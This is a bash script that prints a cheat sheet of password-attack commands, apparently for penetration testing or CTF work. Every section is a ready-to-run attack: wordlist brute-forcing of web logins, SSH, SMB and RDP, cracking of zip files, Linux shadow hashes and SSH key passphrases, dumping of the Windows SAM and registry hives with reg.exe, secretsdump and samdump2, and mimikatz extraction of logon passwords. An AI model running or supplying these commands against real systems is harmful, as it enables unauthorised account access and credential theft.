#!/bin/bash

# display password attack commands 

Frame='\033[0;32m'   # Green
Link='\033[0;35m'  	 # Purple
Title='\033[1;33m' 	 # Bold Yellow
Comment='\033[0;36m' # Cyan
End='\033[0m'		 # No Color
Point='\033[0;31m[*]\033[0m'

# wordlist location
wordlist='/usr/share/wordlists/rockyou.txt'

echo -e "${Frame}###${End} ${Title}Wordlist${End} ${Frame}###${End}"
echo -e "$wordlist"
echo -e ""


echo -e "${Frame}###${End} ${Title}Bruteforce Web Password${End} ${Frame}###${End}"
echo -e "${Point} wfuzz -u \$URL -d \"username=admin&password=FUZZ\" -w $wordlist --hh \$hide_size -c"
echo -e ""


echo -e "${Frame}###${End} ${Title}Bruteforce SSH${End} ${Frame}###${End}"
echo -e "${Point} hydra -l \$user -P wordlist.txt ssh://\$IP"
echo -e ""


echo -e "${Frame}###${End} ${Title}Bruteforce SMB${End} ${Frame}###${End}"
echo -e "${Point} crackmapexec smb -u '\$user' -p \$wordlist --shares \$IP"
echo -e ""


echo -e "${Frame}###${End} ${Title}Bruteforce RDP Password${End} ${Frame}###${End}"
echo -e "${Point} crowbar -b rdp -s \$IP/32 -u \$user -C \$wordlist -v"
echo -e ""


echo -e "${Frame}###${End} ${Title}Crack Zip file Password${End} ${Frame}###${End}"
echo -e "${Point} fcrackzip -u -D -p $wordlist file.zip"
echo -e ""


echo -e "${Frame}###${End} ${Title}Crack Linux Shadow${End} ${Frame}###${End}"
echo -e "${Point} echo \"\$passwd\" > passwd.txt"
echo -e "    echo \"\$shadow\" > shadow.txt"
echo -e "    unshadow passwd.txt shadow.txt > unshadow.txt"
echo -e "    john --wordlist=$wordlist unshadow.txt"
echo -e ""


echo -e "${Frame}###${End} ${Title}Crack Passphrase${End} ${Frame}###${End}"
echo -e "${Point} ssh2john id_rsa > id_rsa_crack"
echo -e "    john --wordlist=$wordlist id_rsa_crack"
echo -e ""


echo -e "${Frame}###${End} ${Title}Crack Windows SAM${End} ${Frame}###${End}"
echo -e "${Point} SAM location: %systemroot%\\\system32\\\config\\\sam"
echo -e "    reg.exe save hklm\sam C:\\\Users\\\Public\\\Documents\\\sam.save"
echo -e "    reg.exe save hklm\security C:\\\Users\\\Public\\\Documents\\\security.save"
echo -e "    reg.exe save hklm\system C:\\\Users\\\Public\\\Documents\\\system.save"
echo -e "    impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL"
echo -e "${Point} samdump2 system.save sam.save > hashes.txt"
echo -e "    john --format=NT --wordlist=$wordlist hashes.txt"
echo -e "    hashcat -m 1000 --force hashes.txt $wordlist"
echo -e ""


echo -e "${Frame}###${End} ${Title}Mimikatz [admin required]${End} ${Frame}###${End}"
echo -e "${Point} mimikatz \"privilege::debug\" \"token::elevate\" \"sekurlsa::logonpasswords\" \"lsadump::sam\" \"exit\""
echo -e ""
